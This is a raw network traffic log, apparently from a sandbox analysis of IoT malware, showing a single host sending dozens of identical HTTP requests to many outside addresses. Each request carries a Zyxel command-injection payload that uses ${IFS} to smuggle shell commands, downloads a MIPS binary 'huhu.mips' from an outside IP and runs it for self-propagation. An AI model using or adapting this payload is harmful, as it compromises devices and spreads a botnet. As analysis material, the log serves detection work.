                                                        Feb 2, 2024 06:21:08.906213045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4169192.168.2.1437398140.254.11.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906246901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4170192.168.2.1458936208.211.21.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906281948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4171192.168.2.1442508139.40.160.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906332016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4172192.168.2.1442890190.239.106.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906356096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4173192.168.2.144012488.19.89.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906385899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4174192.168.2.143782095.105.169.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906439066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4175192.168.2.1453426221.210.163.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906472921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4176192.168.2.145849659.149.95.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906508923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4177192.168.2.1460396172.125.25.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906544924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4178192.168.2.143375850.8.33.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906589031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4179192.168.2.1445690158.167.233.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906609058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4180192.168.2.144003262.69.36.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906641006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4181192.168.2.1460838144.54.158.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906677008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4182192.168.2.144191854.145.68.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906709909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4183192.168.2.146095064.23.206.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906743050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4184192.168.2.1434110118.6.40.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906785011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4185192.168.2.144121235.64.185.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906842947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4186192.168.2.1451572203.213.117.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906872034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4187192.168.2.144077052.198.15.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906893969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4188192.168.2.1454918121.48.226.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906930923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4189192.168.2.1432910126.136.175.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906969070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4190192.168.2.14516745.162.130.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907010078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4191192.168.2.144579645.8.250.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907051086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192192.168.2.145527688.174.153.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907073021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4193192.168.2.1449992176.148.247.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907120943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4194192.168.2.145531432.51.26.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907151937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4195192.168.2.1433592213.13.195.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907187939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4196192.168.2.145991263.93.252.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907227039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4197192.168.2.1450608212.58.207.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907274961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4198192.168.2.1443218169.71.167.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907322884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4199192.168.2.1457814148.156.236.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907371998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4200192.168.2.145791871.245.107.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907402039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4201192.168.2.1436532160.154.219.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907455921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4202192.168.2.1445476118.3.62.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907489061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4203192.168.2.144545636.135.216.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907520056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4204192.168.2.144548647.99.23.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907552958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4205192.168.2.144005045.126.213.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907596111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4206192.168.2.144125274.254.161.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907644987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4207192.168.2.1449332122.71.187.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907682896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4208192.168.2.1456940171.216.30.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907707930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4209192.168.2.145052492.8.185.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907771111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4210192.168.2.143829439.164.154.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907797098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4211192.168.2.1438164128.173.38.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907829046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4212192.168.2.144291632.76.39.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907870054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4213192.168.2.14427941.175.241.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907912970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4214192.168.2.1450034181.210.248.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.907948971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4215192.168.2.1458214181.196.242.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908005953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4216192.168.2.1459180168.137.58.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908027887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4217192.168.2.1444118165.175.84.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908087969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4218192.168.2.144068677.84.108.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908126116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4219192.168.2.144898269.206.176.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908157110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4220192.168.2.145997014.117.168.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908204079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4221192.168.2.1448924194.215.145.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908242941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4222192.168.2.145424079.187.99.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908289909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4223192.168.2.1443274108.84.85.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908319950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4224192.168.2.143606250.165.224.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908373117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4225192.168.2.145894231.105.113.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908401012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4226192.168.2.1459362191.233.185.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908442020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4227192.168.2.1458742190.174.4.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908489943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4228192.168.2.143950043.155.62.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908536911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4229192.168.2.144077462.188.255.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908577919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4230192.168.2.1442068125.253.198.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.908610106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4231192.168.2.145085288.43.112.38443
                                                        TimestampBytes transferredDirectionData
